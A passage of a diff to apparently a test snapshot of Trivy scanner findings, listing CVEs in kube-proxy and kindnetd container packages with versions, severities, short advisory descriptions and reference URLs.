"https://linux.oracle.com/cve/CVE-2020-13529.html", + "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2018-25032.json", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-4361.html", + "value": "https://access.redhat.com/security/cve/CVE-2018-25032", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", + "value": "https://bugzilla.redhat.com/2067945", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-13529", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-333517.pdf", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202107-48", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-25032", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210625-0005/", + "value": "https://errata.almalinux.org/9/ALSA-2022-8420.html", }, { "type": "URL", - "value": "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1142", + "value": "https://github.com/madler/zlib/commit/5c44459c3b28a9bd3283aaceab7c615f8020c531", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5013-1", + "value": "https://github.com/madler/zlib/compare/v1.2.11...v1.2.12", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5013-2", + "value": "https://github.com/madler/zlib/issues/605", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-13529", + "value": "https://github.com/sparklemotion/nokogiri/releases/tag/v1.13.4", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-31437", - "installedVersion": "241-7~deb10u7", - "packageName": "libudev1", - "references": [ - "https://github.com/kastel-security/Journald", - "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", - "https://github.com/systemd/systemd/releases", - ], - }, - "category": "Vulnerability", - "description": "** DISPUTED ** An issue was discovered in systemd 253. An attacker can modify a sealed log file such that, in some views, not all existing and sealed log messages are displayed. NOTE: the vendor reportedly sent "a reply denying that any of the finding was a security vulnerability."", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "An issue was discovered in systemd 253. An attacker can modify a seale ...", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-31437", + "value": "https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-v6gp-9mmm-c6p5", }, { "type": "URL", - "value": "https://github.com/kastel-security/Journald", + "value": "https://groups.google.com/g/ruby-security-ann/c/vX7qSjsvWis/m/TJWN4oOKBwAJ", }, { "type": "URL", - "value": "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", + "value": "https://linux.oracle.com/cve/CVE-2018-25032.html", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/releases", + "value": "https://linux.oracle.com/errata/ELSA-2022-9565.html", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-31438", - "installedVersion": "241-7~deb10u7", - "packageName": "libudev1", - "references": [ - "https://github.com/kastel-security/Journald", - "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", - "https://github.com/systemd/systemd/releases", - ], - }, - "category": "Vulnerability", - "description": "** DISPUTED ** An issue was discovered in systemd 253. An attacker can truncate a sealed log file and then resume log sealing such that checking the integrity shows no error, despite modifications. NOTE: the vendor reportedly sent "a reply denying that any of the finding was a security vulnerability."", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "An issue was discovered in systemd 253. An attacker can truncate a sea ...", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-31438", + "value": "https://lists.debian.org/debian-lts-announce/2022/04/msg00000.html", }, { "type": "URL", - "value": "https://github.com/kastel-security/Journald", + "value": "https://lists.debian.org/debian-lts-announce/2022/05/msg00008.html", }, { "type": "URL", - "value": "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", + "value": "https://lists.debian.org/debian-lts-announce/2022/09/msg00023.html", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/releases", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DCZFIJBJTZ7CL5QXBFKTQ22Q26VINRUF/", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-31439", - "installedVersion": "241-7~deb10u7", - "packageName": "libudev1", - "references": [ - "https://github.com/kastel-security/Journald", - "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", - "https://github.com/systemd/systemd/releases", - ], - }, - "category": "Vulnerability", - "description": "** DISPUTED ** An issue was discovered in systemd 253. An attacker can modify the contents of past events in a sealed log file and then adjust the file such that checking the integrity shows no error, despite modifications. NOTE: the vendor reportedly sent "a reply denying that any of the finding was a security vulnerability."", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "An issue was discovered in systemd 253. An attacker can modify the con ...", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-31439", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DF62MVMH3QUGMBDCB3DY2ERQ6EBHTADB/", }, { "type": "URL", - "value": "https://github.com/kastel-security/Journald", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JZZPTWRYQULAOL3AW7RZJNVZ2UONXCV4/", }, { "type": "URL", - "value": "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NS2D2GFPFGOJUL4WQ3DUAY7HF4VWQ77F/", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/releases", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VOKNP2L734AEL47NRYGVZIKEFOUBQY5Y/", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2012-2663", - "installedVersion": "1.8.5-3~bpo10+1", - "packageName": "libxtables12", - "references": [ - "http://www.spinics.net/lists/netfilter-devel/msg21248.html", - "https://access.redhat.com/security/cve/CVE-2012-2663", - "https://bugzilla.redhat.com/show_bug.cgi?id=826702", - "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", - "https://www.cve.org/CVERecord?id=CVE-2012-2663", - ], - }, - "category": "Vulnerability", - "description": "extensions/libxt_tcp.c in iptables through 1.4.21 does not match TCP SYN+FIN packets in --syn rules, which might allow remote attackers to bypass intended firewall restrictions via crafted packets. NOTE: the CVE-2012-6638 fix makes this issue less relevant.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "iptables: --syn flag bypass", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2012-2663", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XOKFMSNQ5D5WGMALBNBXU3GE442V74WU/", }, { "type": "URL", - "value": "http://www.spinics.net/lists/netfilter-devel/msg21248.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-25032", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2012-2663", + "value": "https://security.gentoo.org/glsa/202210-42", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=826702", + "value": "https://security.netapp.com/advisory/ntap-20220526-0009/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", + "value": "https://security.netapp.com/advisory/ntap-20220729-0004/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2012-2663", + "value": "https://support.apple.com/kb/HT213255", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-11360", - "installedVersion": "1.8.5-3~bpo10+1", - "packageName": "libxtables12", - "references": [ - "https://0day.work/cve-2019-11360-bufferoverflow-in-iptables-restore-v1-8-2/", - "https://access.redhat.com/security/cve/CVE-2019-11360", - "https://git.netfilter.org/iptables/commit/iptables/xshared.c?id=2ae1099a42e6a0f06de305ca13a842ac83d4683e", - "https://nvd.nist.gov/vuln/detail/CVE-2019-11360", - "https://www.cve.org/CVERecord?id=CVE-2019-11360", - ], - }, - "category": "Vulnerability", - "description": "A buffer overflow in iptables-restore in netfilter iptables 1.8.2 allows an attacker to (at least) crash the program or potentially gain code execution via a specially crafted iptables-save file. This is related to add_param_to_argv in xshared.c.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "iptables: buffer overflow in iptables-restore", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-11360", + "value": "https://support.apple.com/kb/HT213256", }, { "type": "URL", - "value": "https://0day.work/cve-2019-11360-bufferoverflow-in-iptables-restore-v1-8-2/", + "value": "https://support.apple.com/kb/HT213257", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-11360", + "value": "https://ubuntu.com/security/notices/USN-5355-1", }, { "type": "URL", - "value": "https://git.netfilter.org/iptables/commit/iptables/xshared.c?id=2ae1099a42e6a0f06de305ca13a842ac83d4683e", + "value": "https://ubuntu.com/security/notices/USN-5355-2", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-11360", + "value": "https://ubuntu.com/security/notices/USN-5359-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-11360", + "value": "https://ubuntu.com/security/notices/USN-5359-2", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2007-5686", - "installedVersion": "1:4.5-1.1", - "packageName": "login", - "references": [ - "http://secunia.com/advisories/27215", - "http://www.securityfocus.com/archive/1/482129/100/100/threaded", - "http://www.securityfocus.com/archive/1/482857/100/0/threaded", - "http://www.securityfocus.com/bid/26048", - "http://www.vupen.com/english/advisories/2007/3474", - "https://issues.rpath.com/browse/RPL-1825", - ], - }, - "category": "Vulnerability", - "description": "initscripts in rPath Linux 1 sets insecure permissions for the /var/log/btmp file, which allows local users to obtain sensitive information regarding authentication attempts. NOTE: because sshd detects the insecure permissions and does not log certain events, this also prevents sshd from logging failed authentication attempts by remote attackers.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "initscripts in rPath Linux 1 sets insecure permissions for the /var/lo ...", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2007-5686", + "value": "https://ubuntu.com/security/notices/USN-5739-1", }, { "type": "URL", - "value": "http://secunia.com/advisories/27215", + "value": "https://www.cve.org/CVERecord?id=CVE-2018-25032", }, { "type": "URL", - "value": "http://www.securityfocus.com/archive/1/482129/100/100/threaded", + "value": "https://www.debian.org/security/2022/dsa-5111", }, { "type": "URL", - "value": "http://www.securityfocus.com/archive/1/482857/100/0/threaded", + "value": "https://www.openwall.com/lists/oss-security/2022/03/24/1", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/26048", + "value": "https://www.openwall.com/lists/oss-security/2022/03/28/1", }, { "type": "URL", - "value": "http://www.vupen.com/english/advisories/2007/3474", + "value": "https://www.openwall.com/lists/oss-security/2022/03/28/3", }, { "type": "URL", - "value": "https://issues.rpath.com/browse/RPL-1825", + "value": "https://www.oracle.com/security-alerts/cpujul2022.html", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2013-4235", - "installedVersion": "1:4.5-1.1", - "packageName": "login", + "fixedVersion": "2.16.0+incompatible", + "foundIn": "Target: 'bin/kindnetd' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-1996", + "installedVersion": "v2.9.5+incompatible", + "packageName": "github.com/emicklei/go-restful", "references": [ - "https://access.redhat.com/security/cve/CVE-2013-4235", - "https://access.redhat.com/security/cve/cve-2013-4235", - "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1998169", - "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-4235", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4235", - "https://github.com/shadow-maint/shadow/issues/317", - "https://github.com/shadow-maint/shadow/pull/545", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772%40%3Cdev.mina.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2013-4235", - "https://security-tracker.debian.org/tracker/CVE-2013-4235", - "https://security.gentoo.org/glsa/202210-26", - "https://ubuntu.com/security/notices/USN-5745-1", - "https://ubuntu.com/security/notices/USN-5745-2", - "https://www.cve.org/CVERecord?id=CVE-2013-4235", + "https://access.redhat.com/security/cve/CVE-2022-1996", + "https://github.com/advisories/GHSA-r48q-9g5r-8q2h", + "https://github.com/emicklei/go-restful/commit/926662532deb450272956c7bc573978464aae74e", + "https://github.com/emicklei/go-restful/commit/f292efff46ae17e9d104f865a60a39a2ae9402f1", + "https://github.com/emicklei/go-restful/commit/fd3c327a379ce08c68ef18765bdc925f5d9bad10", + "https://github.com/emicklei/go-restful/issues/489", + "https://huntr.dev/bounties/be837427-415c-4d8c-808b-62ce20aa84f1", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/575BLJ3Y2EQBRNTFR2OSQQ6L2W6UCST3/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OBDD3Q23RCGAGHIXUCWBU6N3S4RNAKXB/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SO5QC2JFW2PXBWAE27OYYYL5SPFUBHTY/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/W56PP46JVZEKCANBKXFKRVSBBRRMCY6V/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZGQKWD6SE75PFBPFVSZYAKAVXKBZXKWS/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-1996", + "https://pkg.go.dev/vuln/GO-2022-0619", + "https://security.netapp.com/advisory/ntap-20220923-0005/", + "https://www.cve.org/CVERecord?id=CVE-2022-1996", ], }, "category": "Vulnerability", - "description": "shadow: TOCTOU (time-of-check time-of-use) race condition when copying and removing directory trees", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "Authorization Bypass Through User-Controlled Key in GitHub repository emicklei/go-restful prior to v3.8.0.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "shadow-utils: TOCTOU race conditions by copying and removing directory trees", + "name": "Authorization Bypass Through User-Controlled Key", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2013-4235", + "value": "https://avd.aquasec.com/nvd/cve-2022-1996", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2013-4235", + "value": "https://access.redhat.com/security/cve/CVE-2022-1996", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/cve-2013-4235", + "value": "https://github.com/advisories/GHSA-r48q-9g5r-8q2h", }, { "type": "URL", - "value": "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1998169", + "value": "https://github.com/emicklei/go-restful/commit/926662532deb450272956c7bc573978464aae74e", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-4235", + "value": "https://github.com/emicklei/go-restful/commit/f292efff46ae17e9d104f865a60a39a2ae9402f1", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4235", + "value": "https://github.com/emicklei/go-restful/commit/fd3c327a379ce08c68ef18765bdc925f5d9bad10", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/issues/317", + "value": "https://github.com/emicklei/go-restful/issues/489", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/pull/545", + "value": "https://huntr.dev/bounties/be837427-415c-4d8c-808b-62ce20aa84f1", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772%40%3Cdev.mina.apache.org%3E", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/575BLJ3Y2EQBRNTFR2OSQQ6L2W6UCST3/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2013-4235", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OBDD3Q23RCGAGHIXUCWBU6N3S4RNAKXB/", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2013-4235", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202210-26", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SO5QC2JFW2PXBWAE27OYYYL5SPFUBHTY/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5745-1", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/W56PP46JVZEKCANBKXFKRVSBBRRMCY6V/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5745-2", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2013-4235", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZGQKWD6SE75PFBPFVSZYAKAVXKBZXKWS/", + }, + { + "type": "URL", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1996", + }, + { + "type": "URL", + "value": "https://pkg.go.dev/vuln/GO-2022-0619", + }, + { + "type": "URL", + "value": "https://security.netapp.com/advisory/ntap-20220923-0005/", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-1996", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2018-7169", - "installedVersion": "1:4.5-1.1", - "packageName": "login", + "fixedVersion": "0.0.0-20220906165146-f3363e06e74c", + "foundIn": "Target: 'bin/kindnetd' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-27664", + "installedVersion": "v0.0.0-20220127200216-cd36cc0744dd", + "packageName": "golang.org/x/net", "references": [ - "https://access.redhat.com/security/cve/CVE-2018-7169", - "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1729357", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7169", - "https://github.com/shadow-maint/shadow/pull/97", - "https://nvd.nist.gov/vuln/detail/CVE-2018-7169", - "https://security.gentoo.org/glsa/201805-09", - "https://ubuntu.com/security/notices/USN-5254-1", - "https://www.cve.org/CVERecord?id=CVE-2018-7169", + "https://access.redhat.com/errata/RHSA-2023:2357", + "https://access.redhat.com/security/cve/CVE-2022-27664", + "https://bugzilla.redhat.com/2107371", + "https://bugzilla.redhat.com/2107374", + "https://bugzilla.redhat.com/2107383", + "https://bugzilla.redhat.com/2107386", + "https://bugzilla.redhat.com/2107388", + "https://bugzilla.redhat.com/2113814", + "https://bugzilla.redhat.com/2124669", + "https://bugzilla.redhat.com/2132868", + "https://bugzilla.redhat.com/2132872", + "https://bugzilla.redhat.com/2161274", + "https://bugzilla.redhat.com/show_bug.cgi?id=1913333", + "https://bugzilla.redhat.com/show_bug.cgi?id=1913338", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", + "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", + "https://bugzilla.redhat.com/show_bug.cgi?id=2113814", + "https://bugzilla.redhat.com/show_bug.cgi?id=2124669", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28851", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28852", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32189", + "https://errata.almalinux.org/9/ALSA-2023-2357.html", + "https://errata.rockylinux.org/RLSA-2022:7129", + "https://github.com/advisories/GHSA-69cg-p879-7622", + "https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479 (go1.18.6)", + "https://github.com/golang/go/commit/9cfe4e258b1c9d4a04a42539c21c7bdb2e227824 (go1.19.1)", + "https://github.com/golang/go/issues/54658", + "https://go.dev/cl/428735", + "https://go.dev/issue/54658", + "https://groups.google.com/g/golang-announce", + "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s", + "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s/m/0tgO0pjiBQAJ", + "https://linux.oracle.com/cve/CVE-2022-27664.html", + "https://linux.oracle.com/errata/ELSA-2023-2802.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXKTHIGE5F576MAPFYCIJXNRGBSPISUF/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXS2OQ57KZC5XZKK5UW4SYKPVQAHIOJX/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-27664", + "https://pkg.go.dev/vuln/GO-2022-0969", + "https://security.gentoo.org/glsa/202209-26", + "https://security.netapp.com/advisory/ntap-20220923-0004/", + "https://ubuntu.com/security/notices/USN-6038-1", + "https://www.cve.org/CVERecord?id=CVE-2022-27664", ], }, "category": "Vulnerability", - "description": "An issue was discovered in shadow 4.5. newgidmap (in shadow-utils) is setuid and allows an unprivileged user to be placed in a user namespace where setgroups(2) is permitted. This allows an attacker to remove themselves from a supplementary group, which may allow access to certain filesystem paths if the administrator has used "group blacklisting" (e.g., chmod g-rwx) to restrict access to paths. This flaw effectively reverts a security feature in the kernel (in particular, the /proc/self/setgroups knob) to prevent this sort of privilege escalation.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "In net/http in Go before 1.18.6 and 1.19.x before 1.19.1, attackers can cause a denial of service because an HTTP/2 connection can hang during closing if shutdown were preempted by a fatal error.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "shadow-utils: newgidmap allows unprivileged user to drop supplementary groups potentially allowing privilege escalation", + "name": "handle server errors after sending GOAWAY", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2018-7169", + "value": "https://avd.aquasec.com/nvd/cve-2022-27664", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2018-7169", + "value": "https://access.redhat.com/errata/RHSA-2023:2357", }, { "type": "URL", - "value": "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1729357", + "value": "https://access.redhat.com/security/cve/CVE-2022-27664", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7169", + "value": "https://bugzilla.redhat.com/2107371", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/pull/97", + "value": "https://bugzilla.redhat.com/2107374", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-7169", + "value": "https://bugzilla.redhat.com/2107383", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/201805-09", + "value": "https://bugzilla.redhat.com/2107386", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5254-1", + "value": "https://bugzilla.redhat.com/2107388", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2018-7169", + "value": "https://bugzilla.redhat.com/2113814", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-19882", - "installedVersion": "1:4.5-1.1", - "packageName": "login", - "references": [ - "https://access.redhat.com/security/cve/CVE-2019-19882", - "https://bugs.archlinux.org/task/64836", - "https://bugs.gentoo.org/702252", - "https://github.com/shadow-maint/shadow/commit/edf7547ad5aa650be868cf2dac58944773c12d75", - "https://github.com/shadow-maint/shadow/pull/199", - "https://github.com/void-linux/void-packages/pull/17580", - "https://nvd.nist.gov/vuln/detail/CVE-2019-19882", - "https://security.gentoo.org/glsa/202008-09", - "https://www.cve.org/CVERecord?id=CVE-2019-19882", - ], - }, - "category": "Vulnerability", - "description": "shadow 4.8, in certain circumstances affecting at least Gentoo, Arch Linux, and Void Linux, allows local users to obtain root access because setuid programs are misconfigured. Specifically, this affects shadow 4.8 when compiled using --with-libpam but without explicitly passing --disable-account-tools-setuid, and without a PAM configuration suitable for use with setuid account management tools. This combination leads to account management tools (groupadd, groupdel, groupmod, useradd, userdel, usermod) that can easily be used by unprivileged local users to escalate privileges to root in multiple ways. This issue became much more relevant in approximately December 2019 when an unrelated bug was fixed (i.e., the chmod calls to suidusbins were fixed in the upstream Makefile which is now included in the release version 4.8).", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "shadow-utils: local users can obtain root access because setuid programs are misconfigured", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-19882", + "value": "https://bugzilla.redhat.com/2124669", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-19882", + "value": "https://bugzilla.redhat.com/2132868", }, { "type": "URL", - "value": "https://bugs.archlinux.org/task/64836", + "value": "https://bugzilla.redhat.com/2132872", }, { "type": "URL", - "value": "https://bugs.gentoo.org/702252", + "value": "https://bugzilla.redhat.com/2161274", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/commit/edf7547ad5aa650be868cf2dac58944773c12d75", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1913333", }, { "type": "URL", - "value": "https://github.com/shadow-maint/shadow/pull/199", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1913338", }, { "type": "URL", - "value": "https://github.com/void-linux/void-packages/pull/17580", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-19882", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202008-09", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-19882", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-29383", - "installedVersion": "1:4.5-1.1", - "packageName": "login", - "references": [ - "https://access.redhat.com/security/cve/CVE-2023-29383", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29383", - "https://github.com/shadow-maint/shadow/commit/e5905c4b84d4fb90aefcd96ee618411ebfac663d", - "https://github.com/shadow-maint/shadow/pull/687", - "https://nvd.nist.gov/vuln/detail/CVE-2023-29383", - 